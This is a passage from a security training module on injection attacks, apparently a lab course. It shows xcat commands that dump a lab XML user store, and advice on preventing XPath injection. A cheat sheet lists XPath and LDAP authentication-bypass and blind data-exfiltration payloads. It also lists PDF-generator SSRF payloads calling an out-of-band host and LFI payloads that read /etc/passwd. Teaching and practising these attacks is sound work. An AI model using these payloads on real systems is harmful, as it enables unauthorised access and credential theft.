Injection Attacks

XPath Injection Prevention & Tools

After discussing different ways to exploit XPath injection vulnerabilities, let us discuss what tools we can use to help us during exploitation. Furthermore, we will discuss ways we can prevent XPath injection vulnerabilities.

Tools

We can use the tool xcat to help us exploit XPath injection attacks. It can be installed using pip:

[!bash!]$ pip3 install xcat

Afterward, we can view the different xcat commands by displaying the general help:

[!bash!]$ xcat --help

Usage: xcat [OPTIONS] COMMAND [ARGS]...

Options:
  --version  Show the version and exit.
  --help     Show this message and exit.

Commands:
  detect
  injections
  ip
  run
  shell

The core commands are:

detect: detect XPath injection and print the type of injection found
injections: print all types of injection supported by xcat
ip: print the current external IP address
run: retrieve the XML document by exploiting the XPath injection
shell: xcat shell to run system commands

Each command has its own help, which we can display by running xcat <command> --help.

Data Exfiltration

We must supply xcat with the vulnerable parameter and a list of GET parameters it should send. Additionally, xcat requires a true-string, indicating whether the query returned data. Let us look at the lab from the Data Exfiltration section. The lab is vulnerable to XPath injection in the q parameter. However, we also need to send the f parameter. Furthermore, we know that the query returned data whenever the response does NOT contain the phrase No Result. We can thus specify a negated true-string by prepending an exclamation mark. The final command looks like this:

[!bash!]$ xcat detect http://172.17.0.2/index.php q q=BAR f=fullstreetname --true-string='!No Result'

function call - last string parameter - single quote
Example: /lib/something[function(?)]

Detected features:
xpath-2: False
xpath-3: False
xpath-3.1: False
normalize-space: True
substring-search: True
codepoint-search: False
environment-variables: False
document-uri: False
base-uri: False
current-datetime: False
unparsed-text: False
doc-function: False
linux: False
expath-file: False
saxon: False
oob-http: False
oob-entity-injection: False

The run command can exfiltrate the entire XML document. However, this will take so much time since the XML document is massive. Additionally, we can confirm that the f parameter is also injectable by changing the vulnerable parameter:

[!bash!]$ xcat detect http://172.17.0.2/index.php f q=BAR f=fullstreetname --true-string='!No Result'

function call - last string parameter - single quote
Example: /lib/something[function(?)]

Detected features:
xpath-2: False
xpath-3: False
xpath-3.1: False
normalize-space: True
substring-search: True
codepoint-search: False
environment-variables: False
document-uri: False
base-uri: False
current-datetime: False
unparsed-text: False
doc-function: False
linux: False
expath-file: False
saxon: False
oob-http: False
oob-entity-injection: False

Blind XPath Injection

Now let us exploit the blind XPath exploitation lab from the previous section using xcat. Our injection point is the username POST parameter. We must set the -m POST and --encode FORM flags to tell xcat to send the payload in a POST parameter. Furthermore, we need to specify the vulnerable parameter and a sample value for that parameter that leads to a positive query outcome. In our example, we know that admin is a valid username, so we can use the value admin. We can set the true-string to successfully since that is contained in the response if our query returns data. The final command looks like this:

[!bash!]$ xcat detect http://172.17.0.2/index.php username username=admin -m POST --true-string=successfully --encode FORM

string - single quote                                    
Example: /lib/book[name='?']

Detected features:        
xpath-2: False              
xpath-3: False             
xpath-3.1: False          
normalize-space: True                                                                          
substring-search: True     
codepoint-search: False
environment-variables: False                                                                   
document-uri: False    
base-uri: False
current-datetime: False
unparsed-text: False      
doc-function: False          
linux: False               
expath-file: False        
saxon: False                                                                                   
oob-http: False            
oob-entity-injection: False

Additionally, we can use xcat to exfiltrate the entire XML document:

[!bash!]$ xcat run http://172.17.0.2/index.php username username=admin -m POST --true-string=successfully --encode FORM

<users>                   
        <user>                   
                <username> 
                        kgrenvile
                </username>                                                                    
                <password> 
                        cf9f2931ea9c3deb33e4405b420c4c99
                </password>                                                                    
                <desc> 
                        Internal Test Account 1 
                </desc>
        </user>                                                                                
        <SNIP>
</users>

Prevention

While prepared statements/stored procedures can prevent injections in SQL queries, not all programming languages and libraries provide an equivalent for XPath queries. Therefore, proper (manual) sanitization is the only universal method of preventing XPath injection vulnerabilities.

Generally, we must treat all user input as untrusted and perform sanitization before inserting it into an XPath query. The simplest and most secure way is implementing a whitelist that only allows alphanumeric characters in the user input inserted into the XPath query. The web application can then reject any input that contains characters that are not whitelisted.

Additionally, verifying the expected data type and format when performing sanitization is crucial. If the web application expects an integer, it must verify that the user input consists of only digits. When applicable, we can additionally perform checks for semantical correctness. For instance, if a variable can only assume a fixed set of values, we can check that the user input conforms to these semantical rules in addition to the syntactical ones. An example would be the GET parameter f in the previous sections, which can only assume the values fullstreetname and streetname. The web application can thus check if the user input matches one of these values and is thus semantically correct.

Alternatively to the whitelist approach, a blacklist approach blocking the following XPath control characters is also sufficient, though a whitelist is always preferable:

Single quote: '
Double quote: "
Slash: /
At: @
Equals: =
Wildcard: *
Brackets: [, ], and parentheses (, )

Previous Next

Introduction to Injection Attacks

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

XPath Injection

XPath Syntax

Nodes:

Query	Explanation
`module`	Select all `module` child nodes of the context node
`/`	Select the document root node
`//`	Select descendant nodes of the context node
`.`	Select the context node
`..`	Select the parent node of the context node
`@difficulty`	Select the `difficulty` attribute node of the context node
`text()`	Select all text node child nodes of the context node

Predicates:

Query	Explanation
`/academy_modules/module[1]`	Select the first `module` child node of the `academy_modules` node
`/academy_modules/module[position()=1]`	Equivalent to the above query
`/academy_modules/module[last()]`	Select the last `module` child node of the `academy_modules` node
`/academy_modules/module[position()<3]`	Select the first two `module` child nodes of the `academy_modules` node
`//module[tier=2]/title/text()`	Select the `title` of all modules where the `tier` element node equals `2`
`//module/author[@co-author]/../title`	Select the `title` of all modules where the `author` element node has a `co-author` attribute node
`//module/tier[@difficulty="medium"]/..`	Select all modules where the `tier` element node has a `difficulty` attribute node set to `medium`

Predicate Operands:

Operand	Explanation
`+`	Addition
`-`	Subtraction
`*`	Multiplication
`div`	Division
`=`	Equal
`!=`	Not Equal
`<`	Less than
`<=`	Less than or Equal
`>`	Greater than
`>=`	Greater than or Equal
`or`	Logical Or
`and`	Logical And
`mod`	Modulus

Wildcards:

Query	Explanation
`node()`	Matches any node
`*`	Matches any `element` node
`@*`	Matches any `attribute` node

Union:

Query	Explanation
`//module[tier=2]/title/text() \| //module[tier=3]/title/text()`	Select the title of all modules in tiers `2` and `3`

Authentication Bypass

Description	Username	Query
Regular Authentication	`htb-stdnt`	`/users/user[username/text()='htb-stdnt' and password/text()='295362c2618a05ba3899904a6a3f5bc0']`
Bypass Authentication with known username	`admin' or '1'='1`	`/users/user[username/text()='admin' or '1'='1' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by position	`' or position()=1 or '`	`/users/user[username/text()='' or position()=1 or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by substring	`' or contains(.,'admin') or '`	`/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`

Data Exfiltration

Unrestricted:

Leak entire XML document via union injection: | //text()

Restricted:

Determine schema depth via chain of wildcards /*[1]
iterate through XML schema by increasing the indices to exfiltrate the entire document step-by-step

Blind Data Exfiltration

Description	Payload	Query
Exfiltrating Node Name's Length	`invalid' or string-length(name(/*[1]))=1 and '1'='1`	`/users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']`
Exfiltrating Node Name	`invalid' or substring(name(/*[1]),1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']`
Exfiltrating Number of Child Nodes	`invalid' or count(/[1]/)=1 and '1'='1`	`/users/user[username='invalid' or count(/[1]/)=1 and '1'='1']`
Exfiltrating Value Length	`invalid' or string-length(/users/user[1]/username)=1 and '1'='1`	`/users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']`
Exfiltrating Value	`invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']`

Time-based

Force the web application to iterate over the entire XML document exponentially:

count((//.)[count((//.))])

Determine whether the first letter of the "username" is "a" based on the time it takes: if it is, the query will utilize a significant processing time, otherwise, it won't.

invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1

LDAP Injection

LDAP Search Filter Syntax

Name	Operand	Example	Example Description
Equality	`=`	`(name=Kaylie)`	Matches all entries that contain a `name` attribute with the value `Kaylie`
Greater-Or-Equal	`>=`	`(uid>=10)`	Matches all entries that contain a `uid` attribute with a value greater-or-equal to `10`
Less-Or-Equal	`<=`	`(uid<=10)`	Matches all entries that contain a `uid` attribute with a value less-or-equal to `10`
Approximate Match	`~=`	`(name~=Kaylie)`	Matches all entries that contain a `name` attribute with approximately the value `Kaylie`
And	`(&()())`	`(&(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` and a `title` attribute with the value `Manager`
Or	`(\|()())`	`(\|(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` or a `title` attribute with the value `Manager`
Not	`(!())`	`(!(name=Kaylie))`	Matches all entries that contain a `name` attribute with a value different from `Kaylie`
True	`(&)`	`(&)`	Universal True
False	`(\|)`	`(\|)`	Universal False
Wildcard	`*`	`(name=a)`	Matches all entries that contain a name attribute that contains an `a`

Authentication Bypass

Description	Username	Password	Search Filter
Regular Authentication	`admin`	`admin`	`(&(uid=admin)(userPassword=admin))`
Wildcard Bypass	`*`	`*`	`(&(uid=)(userPassword=))`
Wildcard Bypass targeting specific user	`admin*`	`*`	`(&(uid=admin)(userPassword=))`
Universal True Bypass	`admin)(\|(&`	`invalid)`	`(&(uid=admin)(\|(&)(userPassword=invalid)))`

Data Exfiltration

Brute-Force data character-by-character:

Username	Password	Query
`htb-stdnt`	`*`	`(&(uid=htb-stdnt)(userPassword=*))`
`htb-stdnt`	`p*`	`(&(uid=htb-stdnt)(userPassword=p*))`
`htb-stdnt`	`p@*`	`(&(uid=htb-stdnt)(userPassword=p@*))`
`htb-stdnt`	`p@s*`	`(&(uid=htb-stdnt)(userPassword=p@s*))`
`htb-stdnt`	`p@ss*`	`(&(uid=htb-stdnt)(userPassword=p@ss*))`
`htb-stdnt`	`p@ssw*`	`(&(uid=htb-stdnt)(userPassword=p@ssw*))`
`htb-stdnt`	`p@ssw0*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0*))`
`htb-stdnt`	`p@ssw0r*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0r*))`
`htb-stdnt`	`p@ssw0rd*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd*))`
`htb-stdnt`	`p@ssw0rd`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd))`

PDF Generation Vulnerabilities

Determining the PDF Generation Library

$ exiftool invoice.pdf 
<SNIP>
Creator                         : wkhtmltopdf 0.12.6.1
Producer                        : Qt 4.8.7
<SNIP>

Server-Side Request Forgery (SSRF) Payloads

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>
<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2">
<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>

Local File Inclusion (LFI) Payloads

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500">
<portal src="file:///etc/passwd" width="800" height="500">

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />

Injection Attacks

XPath Injection Prevention & Tools

Tools

Data Exfiltration

Blind XPath Injection

Prevention

Table of Contents

Introduction to Injection Attacks

XPath Injection

LDAP Injection

HTML Injection in PDF Generators

Skills Assessment

My Workstation